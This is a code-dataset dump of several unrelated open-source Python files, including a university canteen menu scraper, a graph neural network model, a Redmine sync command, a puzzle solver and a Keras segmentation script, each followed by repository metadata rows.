elif i == 3: # Link menu
a = cell.find('a')
#print(name, a)
if a is not None:
html = requests.get('http://www.esupd.gov.it' + a['href'])
html = BeautifulSoup(html.content, "html.parser")
menu = html.find('div', attrs={'id': 'WebPartWPQ5'})
for i, portata in enumerate(menu.find_all('ul')):
text = [_.text.replace(':','').replace('*','').replace(',\r','').replace('\t','').replace('\n','').replace('\r\r',', ').replace('\r','') for _ in portata.find_all('li')]
if i == 0: # Primo
mense[name]['pranzo']['primo'] = ', '.join(text)
elif i == 1: # Secondo
mense[name]['pranzo']['secondo'] = ', '.join(text)
elif i == 2: # Contorno
mense[name]['pranzo']['contorno'] = ', '.join(text)
elif i == 3: # Dolce
mense[name]['pranzo']['dessert'] = ', '.join(text)
# Menù trovato -> aggiunge la mensa al daily_mensa
if name not in self.daily_mensa['completed'] and \
name not in self.daily_mensa['new']:
self.daily_mensa['new'].append(name)
orari = [['piovego', 'Nord Piovego', 'viale Colombo 1', '11:30', '14:30'],
['agripolis', 'Agripolis', 'viale Università 16, Legnaro', '11:45', '14:30'],
['belzoni', 'Belzoni', 'Via Belzoni, 146', '11:45', '14:30'],
['murialdo', 'Murialdo', 'Via Grassi 42', '11:45', '14:30', '19:15', '20:45'],
['forcellini', 'Forcellini', 'Via Forcellini, 172', '11:45', '14:30'],
['acli', 'Acli - Pio X', 'Via Bonporti 20', '11:30', '14:30', '18:45', '21:00'],
['sanfrancesco', 'San Francesco', 'Via S. Francesco, 122', '', '']]
for row in orari:
mense[row[0]]['nome'] = row[1]
mense[row[0]]['indirizzo'] = row[2]
mense[row[0]]['pranzo']['apertura'] = row[3]
mense[row[0]]['pranzo']['chiusura'] = row[4]
try:
mense[row[0]]['cena']['apertura'] = row[5]
mense[row[0]]['cena']['chiusura'] = row[6]
except:
pass
with open(self.path + 'mense.json', 'w') as outfile:
json.dump(mense, outfile, indent=4)
self.update_json()
class RepeatedTimer(object):
def __init__(self, interval, function):
self._timer = None
self.interval = interval
self.function = function
self.is_running = False
self.start()
def _run(self):
self.is_running = False
self.start()
self.function()
def start(self):
if not self.is_running:
self._timer = Timer(self.interval, self._run)
self._timer.start()
self.is_running = True
def stop(self):
self._timer.cancel()
self.is_running = False
if __name__ == '__main__':
from config import supported_languages, captions_path
# Used as update script by cron
a = Captions(supported_languages, captions_path, quick=False)
#print(a.reply_position({'longitude': 11.891931, 'latitude': 45.407387}))
#print(a.get_command_handlers('orario'))
#print(a.get_command_handlers('sub_commands'))
a.update_mense()
#print(a.daily_mensa)
#print(a.get_reply('acli'))
a.stop()
| 43.929319 | 201 | 0.491389 | 1,776 | 16,781 | 4.561937 | 0.208896 | 0.032585 | 0.016292 | 0.023451 | 0.246853 | 0.180079 | 0.150457 | 0.125648 | 0.084053 | 0.067514 | 0 | 0.020124 | 0.33669 | 16,781 | 381 | 202 | 44.044619 | 0.707753 | 0.050891 | 0 | 0.193103 | 0 | 0.003448 | 0.183209 | 0 | 0 | 0 | 0 | 0.002625 | 0 | 1 | 0.044828 | false | 0.010345 | 0.024138 | 0 | 0.103448 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5e5ea98841b742b1b5604825ff3dfb2155b8ad2 | 6,211 | py | Python | openhgnn/models/HPN.py | BUPTlfq/OpenHGNN | 77041e68c33a8a42a2c187c6e42d85b81cbb25d3 | [
"Apache-2.0"
] | null | null | null | openhgnn/models/HPN.py | BUPTlfq/OpenHGNN | 77041e68c33a8a42a2c187c6e42d85b81cbb25d3 | [
"Apache-2.0"
] | null | null | null | openhgnn/models/HPN.py | BUPTlfq/OpenHGNN | 77041e68c33a8a42a2c187c6e42d85b81cbb25d3 | [
"Apache-2.0"
] | null | null | null | """
This model shows an example of using dgl.metapath_reachable_graph on the original heterogeneous
graph.
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import dgl
from scipy import sparse as sp
from . import BaseModel, register_model
from dgl.nn.pytorch.conv import APPNPConv
@register_model('HPN')
class HPN(BaseModel):
r"""
Description
------------
This model shows an example of using dgl.metapath_reachable_graph on the original heterogeneous
graph.HPN from paper 'Heterogeneous Graph Propagation Network <https://ieeexplore.ieee.org/abstract/document/9428609>'
The author did not provide codes. So, we complete it according to the implementation of HAN
.. math::
\bold Z^\Phi=\mathcal{P}_\Phi(\bold X)=g_\Phi(f_\Phi(\bold X))
\bold H^\Phi=f_\Phi(\bold X)=\sigma(\bold X · \bold W^\Phi+\bold b^\Phi)
\mathbf{Z}^{\Phi, k}=g_{\Phi}\left(\mathbf{Z}^{\Phi, k-1}\right)=(1-\gamma) \cdot \mathbf{M}^{\Phi} \cdot \mathbf{Z}^{\Phi, k-1}+\gamma \cdot \mathbf{H}^{\Phi}
w_{\Phi_{p}}=\frac{1}{|\mathcal{V}|} \sum_{i \in \mathcal{V}} \mathbf{q}^{\mathrm{T}} \cdot \tanh \left(\mathbf{W} \cdot \mathbf{z}_{i}^{\Phi_{p}}+\mathbf{b}\right)
\mathbf{Z}=\sum_{p=1}^{P} \beta_{\Phi_{p}} \cdot \mathbf{Z}^{\Phi_{p}}
Parameters
------------
meta_paths : list
contain multiple meta-paths.
category : str
The category means the head and tail node of metapaths.
in_size : int
input feature dimension.
out_size : int
out dimension.
dropout : float
Dropout probability.
out_embedsizes : int
Dimension of the final embedding Z
k_layer : int
propagation times :math:'K'.
alpha : float
Value of restart probability :math:'\alpha'.
edge_drop : float, optional
The dropout rate on edges that controls the
messages received by each node. Default: ``0``.
"""
@classmethod
def build_model_from_args(cls, args, hg):
etypes = hg.canonical_etypes
mps = []
for etype in etypes:
if etype[0] == args.category:
for dst_e in etypes:
if etype[0] == dst_e[2] and etype[2] == dst_e[0]:
mps.append([etype, dst_e])
return cls(meta_paths=mps, category=args.category,
in_size=args.hidden_dim,
out_size=args.out_dim,
dropout=args.dropout,
out_embedsize=args.out_embedsize,
k_layer=args.k_layer,
alpha=args.alpha,
edge_drop=args.edge_drop
)
def __init__(self, meta_paths, category, in_size, out_size, dropout, out_embedsize, k_layer, alpha, edge_drop):
super(HPN, self).__init__()
self.category = category
self.layers = nn.ModuleList()
self.layers.append(HPNLayer(meta_paths, in_size, dropout, k_layer, alpha, edge_drop, out_embedsize))
self.linear = nn.Linear(out_embedsize, out_size)
def forward(self, g, h_dict):
h = h_dict[self.category]
for gnn in self.layers:
h = gnn(g, h)
return {self.category: self.linear(h)}
class SemanticFusion(nn.Module):
def __init__(self, in_size=64, hidden_size=128):
super(SemanticFusion, self).__init__()
self.project = nn.Sequential(
nn.Linear(in_size, hidden_size),
nn.Tanh(),
nn.Linear(hidden_size, 1, bias=False)
)
def forward(self, z):
w = self.project(z).mean(0)
beta = torch.softmax(w, dim=0)
beta = beta.expand((z.shape[0],) + beta.shape)
return (beta * z).sum(1)
class HPNLayer(nn.Module):
"""
HPN layer.
Arguments
---------
meta_paths : list of metapaths, each as a list of edge types
in_size : input feature dimension
dropout : Dropout probability
k_layer : propagation times
alpha : Value of restart probability
edge_drop : the dropout rate on edges that controls the messages received by each node
out_embedsize : Dimension of the final embedding Z
Inputs
------
g : DGLHeteroGraph
The heterogeneous graph
h : tensor
Input features
Outputs
-------
tensor
The output feature
"""
def __init__(self, meta_paths, in_size, dropout,k_layer, alpha, edge_drop, out_embedsize):
super(HPNLayer, self).__init__()
# semantic projection function fΦ projects node into semantic space
self.hidden = nn.Sequential(
#nn.Linear(in_features=in_size, out_features=out_embedsize, bias=True),
nn.ReLU()
)
# One Propagation layer for each meta path
self.propagation_layers = nn.ModuleList()
for i in range(len(meta_paths)):
self.propagation_layers.append(APPNPConv(k_layer, alpha, edge_drop))
self.semantic_fusion = SemanticFusion()
self.meta_paths = list(tuple(meta_path) for meta_path in meta_paths)
self._cached_graph = None
self._cached_coalesced_graph = {}
def forward(self, g, h):
r"""
Parameters
-----------
g : DGLHeteroGraph
The heterogeneous graph
h : tensor
The input features
Returns
--------
h : tensor
The output features
"""
semantic_embeddings = []
h = self.hidden(h)
if self._cached_graph is None or self._cached_graph is not g:
self._cached_graph = g
self._cached_coalesced_graph.clear()
for meta_path in self.meta_paths:
self._cached_coalesced_graph[meta_path] = dgl.metapath_reachable_graph(
g, meta_path)
for i, meta_path in enumerate(self.meta_paths):
new_g = self._cached_coalesced_graph[meta_path]
semantic_embeddings.append(self.propagation_layers[i](new_g, h).flatten(1))
semantic_embeddings = torch.stack(semantic_embeddings, dim=1)
return self.semantic_fusion(semantic_embeddings)
| 32.689474 | 172 | 0.609886 | 807 | 6,211 | 4.508055 | 0.262701 | 0.029687 | 0.02144 | 0.016493 | 0.236669 | 0.167675 | 0.13414 | 0.1105 | 0.1105 | 0.1105 | 0 | 0.006693 | 0.278377 | 6,211 | 189 | 173 | 32.862434 | 0.804775 | 0.386733 | 0 | 0 | 0 | 0 | 0.000865 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08642 | false | 0 | 0.098765 | 0 | 0.271605 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5e726c942c514e6fc040b888b81d139effa2457 | 1,455 | py | Python | rllib/environment/systems/gaussian_system.py | shenao-zhang/DCPU | 0da9aa2b7878b54ba4ee4dca894c2e86cdc0d559 | [
"MIT"
] | 8 | 2020-10-23T07:52:19.000Z | 2022-03-06T13:35:12.000Z | rllib/environment/systems/gaussian_system.py | shenao-zhang/DCPU | 0da9aa2b7878b54ba4ee4dca894c2e86cdc0d559 | [
"MIT"
] | 3 | 2021-03-04T13:44:01.000Z | 2021-03-23T09:57:50.000Z | rllib/environment/systems/gaussian_system.py | shenao-zhang/DCPU | 0da9aa2b7878b54ba4ee4dca894c2e86cdc0d559 | [
"MIT"
] | 3 | 2021-03-18T08:23:56.000Z | 2021-07-06T11:20:12.000Z | """Implementation of a System with Gaussian transition and measurement noise."""
import numpy as np
from .abstract_system import AbstractSystem
class GaussianNoiseSystem(AbstractSystem):
"""Modify a system with gaussian transition and measurement noise.
Parameters
----------
system: AbstractSystem
transition_noise_scale: float
measurement_noise_scale: float, optional
"""
def __init__(self, system, transition_noise_scale, measurement_noise_scale=0):
super().__init__(
dim_state=system.dim_state,
dim_action=system.dim_action,
dim_observation=system.dim_observation,
)
self._system = system
self._transition_noise_scale = transition_noise_scale
self._measurement_noise_scale = measurement_noise_scale
def step(self, action):
"""See `AbstractSystem.step'."""
next_state = self._system.step(action)
next_state += self._transition_noise_scale * np.random.randn(self.dim_state)
return next_state
def reset(self, state):
"""See `AbstractSystem.reset'."""
return self._system.reset(state)
@property
def state(self):
"""See `AbstractSystem.state'."""
state = self._system.state
state += self._measurement_noise_scale * np.random.randn(self.dim_state)
return state
@state.setter
def state(self, value):
self._system.state = value
| 29.693878 | 84 | 0.674914 | 162 | 1,455 | 5.759259 | 0.265432 | 0.107181 | 0.107181 | 0.040729 | 0.257235 | 0.190782 | 0.190782 | 0.190782 | 0.087889 | 0 | 0 | 0.000891 | 0.228866 | 1,455 | 48 | 85 | 30.3125 | 0.83066 | 0.232302 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.192308 | false | 0 | 0.076923 | 0 | 0.423077 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5ec84ef8dd62cb492046d2371c97d2fa37e8b51 | 1,013 | py | Python | apps/tasker/management/commands/sync_all.py | hugoseabra/redmine-task-generator | b5ce1764f1c7588a7c82b25f7dd4bf07d1c105cf | [
"MIT"
] | null | null | null | apps/tasker/management/commands/sync_all.py | hugoseabra/redmine-task-generator | b5ce1764f1c7588a7c82b25f7dd4bf07d1c105cf | [
"MIT"
] | 4 | 2021-03-30T14:04:56.000Z | 2021-06-10T19:40:52.000Z | apps/tasker/management/commands/sync_all.py | hugoseabra/redmine-task-generator | b5ce1764f1c7588a7c82b25f7dd4bf07d1c105cf | [
"MIT"
] | null | null | null | from django.core.management import call_command
from django.core.management.base import BaseCommand
from core.cli.mixins import CliInteractionMixin
from redmine import Redmine
class Command(BaseCommand, CliInteractionMixin):
help = "Syncronizes all data to Redmine instance."
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.redmine = Redmine()
def handle(self, *args, **options):
print()
self.stdout.write('VALIDATING REDMINE INSTANCE')
print()
if self.redmine.instance_valid() is False:
self.stderr.write(self.style.ERROR('Errors:'))
for e in self.redmine.instance_errors():
self.stderr.write(self.style.ERROR(f'- {e}'))
self.exit()
call_command('sync_trackers')
call_command('sync_score_field')
call_command('sync_projects')
call_command('sync_categories')
call_command('sync_versions')
call_command('sync_issues')
| 30.69697 | 61 | 0.65844 | 116 | 1,013 | 5.543103 | 0.456897 | 0.119751 | 0.139969 | 0.07465 | 0.090202 | 0.090202 | 0 | 0 | 0 | 0 | 0 | 0 | 0.228036 | 1,013 | 32 | 62 | 31.65625 | 0.822251 | 0 | 0 | 0.083333 | 0 | 0 | 0.158934 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.333333 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5ee4c60b25530e2b119645f9ed429a666be7ec0 | 1,550 | py | Python | 2021/17/solve.py | lamperi/aoc | 1781dcbac0be18a086c10a9b76fb6a2d3595523c | [
"MIT"
] | null | null | null | 2021/17/solve.py | lamperi/aoc | 1781dcbac0be18a086c10a9b76fb6a2d3595523c | [
"MIT"
] | null | null | null | 2021/17/solve.py | lamperi/aoc | 1781dcbac0be18a086c10a9b76fb6a2d3595523c | [
"MIT"
] | null | null | null | from io import TextIOBase
import os.path
import operator
from itertools import combinations, permutations
from functools import reduce, partial
from math import prod
from collections import Counter
INPUT=os.path.join(os.path.dirname(__file__), "input.txt")
with open(INPUT) as f:
data = f.read()
test="""target area: x=20..30, y=-10..-5"""
def part12(data):
l = data.split()
x=l[2]
y=l[3]
min_x, max_x = list(map(int, x.split("=")[1].split(",")[0].split("..")))
min_y, max_y = list(map(int, y.split("=")[1].split("..")))
highest_y=0
matches=set()
# vy is limited so that:
# - smaller one would make shot go past on first step
# - larger one would make shot go past on first step after it comes back from high point
# vx in limited so that larger one would make shot go past on first step
for vy in range(min_y,-min_y):
for vx in range(max_x+1):
s=(0,0)
v=(vy,vx)
ymax=0
hit=False
for t in range(500000):
s = (s[0]+v[0], s[1]+v[1])
ymax = max((ymax, s[0]))
v=(v[0]-1, max(0, v[1]-1))
if min_x <= s[1] <= max_x and min_y <= s[0] <= max_y:
hit=True
break
elif s[0] < min_y or s[1] > max_x:
break
if hit:
matches.add((vy,vx))
highest_y = max((highest_y, ymax))
return f"{highest_y} {len(matches)}"
print(part12(test))
print(part12(data))
| 29.807692 | 92 | 0.540645 | 247 | 1,550 | 3.307692 | 0.388664 | 0.02448 | 0.044064 | 0.058752 | 0.135863 | 0.135863 | 0.135863 | 0.135863 | 0.135863 | 0.095471 | 0 | 0.040528 | 0.315484 | 1,550 | 51 | 93 | 30.392157 | 0.7295 | 0.149677 | 0 | 0.05 | 0 | 0 | 0.056445 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025 | false | 0 | 0.175 | 0 | 0.225 | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5f161e953bf4e647b2dba3274549ebc84e9aa60 | 1,665 | py | Python | setup.py | bintoro/schematics | 6eb68dbecd09fa695a867a493d692d1befc039f2 | [
"BSD-3-Clause"
] | null | null | null | setup.py | bintoro/schematics | 6eb68dbecd09fa695a867a493d692d1befc039f2 | [
"BSD-3-Clause"
] | null | null | null | setup.py | bintoro/schematics | 6eb68dbecd09fa695a867a493d692d1befc039f2 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
from schematics import __version__
class Tox(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = ['--recreate']
self.test_suite = True
def run_tests(self):
# import here, cause outside the eggs aren't loaded
import tox
errno = tox.cmdline(self.test_args)
sys.exit(errno)
tests_require = open(
os.path.join(os.path.dirname(__file__), 'requirements.txt')).read().split()
setup(
name='schematics',
license='BSD',
version=__version__,
description='Structured Data for Humans',
author=u'James Dennis, Jökull Sólberg, Jóhann Þorvaldur Bergþórsson',
author_email='jdennis@gmail.com, jokull@plainvanillagames.com, johann@plainvanillagames.com',
url='http://github.com/schematics/schematics',
packages=['schematics', 'schematics.types', 'schematics.contrib'],
classifiers=[
'Environment :: Other Environment',
'Intended Audience :: Developers',
'License :: Other/Proprietary License',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
cmdclass={
'test': Tox,
},
install_requires=[
'six>=1.7.3',
],
tests_require=tests_require,
)
| 29.210526 | 97 | 0.645045 | 182 | 1,665 | 5.774725 | 0.571429 | 0.108468 | 0.142721 | 0.074215 | 0.05138 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010062 | 0.224024 | 1,665 | 56 | 98 | 29.732143 | 0.803406 | 0.055255 | 0 | 0.044444 | 0 | 0 | 0.403822 | 0.036306 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044444 | false | 0 | 0.133333 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5f208e8fafb3683bef084c028636aeac944b3df | 4,562 | py | Python | flashfocus/flasher.py | Airblader/flashfocus | 1a04e5c68a0a9ee44e0fa6454b6addeb4ba3cb68 | [
"MIT"
] | 4 | 2018-06-26T17:48:49.000Z | 2020-06-11T11:39:15.000Z | flashfocus/flasher.py | Airblader/flashfocus | 1a04e5c68a0a9ee44e0fa6454b6addeb4ba3cb68 | [
"MIT"
] | null | null | null | flashfocus/flasher.py | Airblader/flashfocus | 1a04e5c68a0a9ee44e0fa6454b6addeb4ba3cb68 | [
"MIT"
] | 1 | 2019-03-07T03:50:07.000Z | 2019-03-07T03:50:07.000Z | """Monitor focus and flash windows."""
from __future__ import division
from threading import Thread
import os
import logging
from logging import info as log
from time import sleep
from xcffib.xproto import WindowError
import flashfocus.xutil as xutil
class Flasher:
"""Main flashfocus class.
Waits for focused window to change then flashes it.
Parameters
----------
flash_opacity: float
Flash opacity as a decimal between 0 and 1
time: float
Flash interval in seconds
ntimepoints: int
Number of timepoints in the flash animation. Higher values will lead to
smoother animations at the cost of increased X server requests.
Ignored if simple is True.
simple: bool
If True, don't animate flashes. Setting this parameter improves
performance but causes rougher opacity transitions.
"""
def __init__(self, flash_opacity, time, ntimepoints, simple):
self.flash_opacity = flash_opacity
self.time = time
self.simple = simple
if simple:
self.ntimepoints = 1
self.timechunk = time
else:
self.ntimepoints = ntimepoints
self.timechunk = time / self.ntimepoints
self.flash_series_hash = {}
self.locked_windows = set()
def compute_flash_series(self, current_opacity):
"""Calculate the series of opacity values for the flash animation.
Given the opacity of a window before a flash, and the flash opacity,
this method calculates a smooth series of intermediate opacity values.
Results of the calculation are hashed to speed up later flashes.
"""
if not current_opacity:
current_opacity = 1
try:
return self.flash_series_hash[current_opacity]
except KeyError:
log('Computing flash series for opacity = %s', current_opacity)
opacity_diff = current_opacity - self.flash_opacity
flash_series = [self.flash_opacity +
((x / self.ntimepoints) * opacity_diff)
for x in range(self.ntimepoints)]
log('Computed flash series = %s', flash_series)
self.flash_series_hash[current_opacity] = flash_series
return flash_series
def flash_window(self, window):
"""Briefly change the opacity of a Xorg window."""
log('Flashing window %s', str(window))
try:
pre_flash_opacity = xutil.request_opacity(window).unpack()
log('Current opacity = %s', str(pre_flash_opacity))
log('Beginning flash animation...')
flash_series = self.compute_flash_series(pre_flash_opacity)
for opacity in flash_series:
xutil.set_opacity(window, opacity)
sleep(self.timechunk)
log('Resetting opacity to default')
if pre_flash_opacity:
xutil.set_opacity(window, pre_flash_opacity)
else:
xutil.delete_opacity(window)
except WindowError:
log('Attempted to flash a nonexistant window %s, ignoring...',
str(window))
log('Unlocking window %s', window)
self.locked_windows.discard(window)
def monitor_focus(self):
"""Wait for changes in focus and flash windows."""
xutil.start_watching_properties(xutil.ROOT_WINDOW)
# We keep track of the previously focused window so that the same window
# is never flashed twice in a row. On i3 when a window is closed, the
# next window is flashed three times without this guard.
prev_focus = None
focused = None
while True:
xutil.wait_for_focus_shift()
prev_focus = focused
focused = xutil.request_focus().unpack()
log('Focus shifted to window %s', focused)
if focused not in self.locked_windows and focused != prev_focus:
# Further flash requests are ignored for the window until the
# thread completes.
log('Locking window %s', focused)
self.locked_windows.add(focused)
p = Thread(target=self.flash_window, args=[focused])
p.daemon = True
p.start()
elif focused == prev_focus:
log("Window %s was just flashed, ignoring...", focused)
elif focused in self.locked_windows:
log("Window %s is locked, ignoring...", focused)
| 36.790323 | 80 | 0.619904 | 539 | 4,562 | 5.113173 | 0.328386 | 0.056604 | 0.030842 | 0.020682 | 0.023948 | 0.023948 | 0 | 0 | 0 | 0 | 0 | 0.00159 | 0.310609 | 4,562 | 123 | 81 | 37.089431 | 0.874722 | 0.2637 | 0 | 0.054054 | 0 | 0 | 0.107297 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.108108 | 0 | 0.202703 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5f5eb2e3a25f04de70d6baa6fe5677c9db2ce33 | 1,055 | py | Python | 1201-1300/1226-The Dining Philosophers/1226-The Dining Philosophers.py | jiadaizhao/LeetCode | 4ddea0a532fe7c5d053ffbd6870174ec99fc2d60 | [
"MIT"
] | 49 | 2018-05-05T02:53:10.000Z | 2022-03-30T12:08:09.000Z | 1201-1300/1226-The Dining Philosophers/1226-The Dining Philosophers.py | jolly-fellow/LeetCode | ab20b3ec137ed05fad1edda1c30db04ab355486f | [
"MIT"
] | 11 | 2017-12-15T22:31:44.000Z | 2020-10-02T12:42:49.000Z | 1201-1300/1226-The Dining Philosophers/1226-The Dining Philosophers.py | jolly-fellow/LeetCode | ab20b3ec137ed05fad1edda1c30db04ab355486f | [
"MIT"
] | 28 | 2017-12-05T10:56:51.000Z | 2022-01-26T18:18:27.000Z | from threading import Semaphore, Lock
class DiningPhilosophers:
def __init__(self):
self.sem = Semaphore(4)
self.locks = [Lock() for _ in range(5)]
def pickFork(self, id, fun):
self.locks[id].acquire()
fun()
def putFork(self, id, fun):
fun()
self.locks[id].release()
# call the functions directly to execute, for example, eat()
def wantsToEat(self,
philosopher: int,
pickLeftFork: 'Callable[[], None]',
pickRightFork: 'Callable[[], None]',
eat: 'Callable[[], None]',
putLeftFork: 'Callable[[], None]',
putRightFork: 'Callable[[], None]') -> None:
left = philosopher
right = (philosopher + 4) % 5
self.sem.acquire()
self.pickFork(left, pickLeftFork)
self.pickFork(right, pickRightFork)
eat()
self.putFork(right, putRightFork)
self.putFork(left, putLeftFork)
self.sem.release()
| 31.029412 | 64 | 0.531754 | 100 | 1,055 | 5.56 | 0.42 | 0.107914 | 0.032374 | 0.05036 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005772 | 0.343128 | 1,055 | 33 | 65 | 31.969697 | 0.796537 | 0.054976 | 0 | 0.074074 | 0 | 0 | 0.090452 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.148148 | false | 0 | 0.037037 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5f7607972db8587d9fae4b2354ebcbe801fb37b | 4,151 | py | Python | ML/gtsdb/semantic_seg.py | PepSalehi/algorithms | 1c20f57185e6324aa840ccff98e69764b4213131 | [
"MIT"
] | null | null | null | ML/gtsdb/semantic_seg.py | PepSalehi/algorithms | 1c20f57185e6324aa840ccff98e69764b4213131 | [
"MIT"
] | null | null | null | ML/gtsdb/semantic_seg.py | PepSalehi/algorithms | 1c20f57185e6324aa840ccff98e69764b4213131 | [
"MIT"
] | 1 | 2019-12-09T21:40:46.000Z | 2019-12-09T21:40:46.000Z | #!/usr/bin/env python
"""Semantic Segmentation experiment."""
from keras.models import load_model
from keras.models import Model
from keras.layers import UpSampling2D
import scipy.misc
import numpy as np
from PIL import Image
import logging
import sys
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',
level=logging.DEBUG,
stream=sys.stdout)
def scale_array(x, new_size):
"""
Scale a numpy array.
Parameters
----------
x : numpy array
new_size : tuple
Returns
-------
scaled array
"""
min_el = np.min(x)
max_el = np.max(x)
y = scipy.misc.imresize(x, new_size, mode='L', interp='nearest')
y = y / 255.0 * (max_el - min_el) + min_el
return y
def get_overlay_name(segmentation_name):
splitted = segmentation_name.split('.')
splitted[-2] = splitted[-2] + '-overlay'
output_path = '.'.join(splitted)
return output_path
def overlay_images(original_image,
segmentation_image,
hard_classification=True):
"""
Overlay original_image with segmentation_image.
store the result with the same name as segmentation_image, but with
`-overlay`.
Parameters
----------
original_image : string
Path to an image file
segmentation_image : string
Path to the an image file of the same size as original_image
hard_classification : bool
If True, the image will only show either street or no street.
If False, the image will show probabilities.
"""
background = Image.open(original_image)
overlay = Image.open(segmentation_image)
overlay = overlay.convert('RGB')
# Replace colors of segmentation to make it easier to see
street_color = (255, 255, 255)
width, height = overlay.size
pix = overlay.load()
pixels_debug = list(overlay.getdata())
logging.info('%i colors in classification (min=%s, max=%s)',
len(list(set(pixels_debug))),
min(pixels_debug),
max(pixels_debug))
for x in range(0, width):
for y in range(0, height):
if not hard_classification:
overlay.putpixel((x, y), (0, pix[x, y][0], 0))
else:
if pix[x, y] == street_color:
overlay.putpixel((x, y), (0, 255, 0))
else:
overlay.putpixel((x, y), (0, 0, 0))
background = background.convert('RGBA')
overlay = overlay.convert('RGBA')
new_img = Image.blend(background, overlay, 0.5)
# get new name
output_path = get_overlay_name(segmentation_image)
new_img.save(output_path, 'PNG')
model = load_model("gtsdb-fully.h5")
# model.layers.pop() # Get rid of the classification layer softmax
# model.layers.pop() # Get rid of the classification layer softmax
# model.outputs = [model.layers[-1].output]
# model.output_layers = [model.layers[-1]] # added this line in addition to zo7 solution
# model.layers[-1].outbound_nodes = []
# model.summary()
# Get input
# new_input = model.input
# new_input.input_shape = (1, None, None, 3)
# # Find the layer to connect
# # hidden_layer = model.layers[-1].output
# # # Connect a new layer on it
# # new_output = Dense(2)(hidden_layer)
# # Build a new model
# model2 = Model(new_input, hidden_layer)
model.add(UpSampling2D((2, 2))) # Deconvolution2D
model.add(UpSampling2D((2, 2))) # Deconvolution2D - (333, 193)
model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=["accuracy"])
model.summary()
original_image = "00072.ppm"
img = scipy.misc.imread(original_image)
img = np.array(img, dtype=np.float32)
img /= 255.0
# scipy.misc.imshow(img)
img_shape = img.shape[:2]
img = img.reshape([1] + list(img.shape))
pred = model.predict(img)
pred = pred[0].transpose((2, 1, 0))
for i, layer in enumerate(pred):
print(layer.shape)
layer = scale_array(layer, img_shape)
segmentation_fname = 'segmentations/{}.png'.format(i)
scipy.misc.imsave(segmentation_fname, layer)
overlay_images(original_image, segmentation_fname)
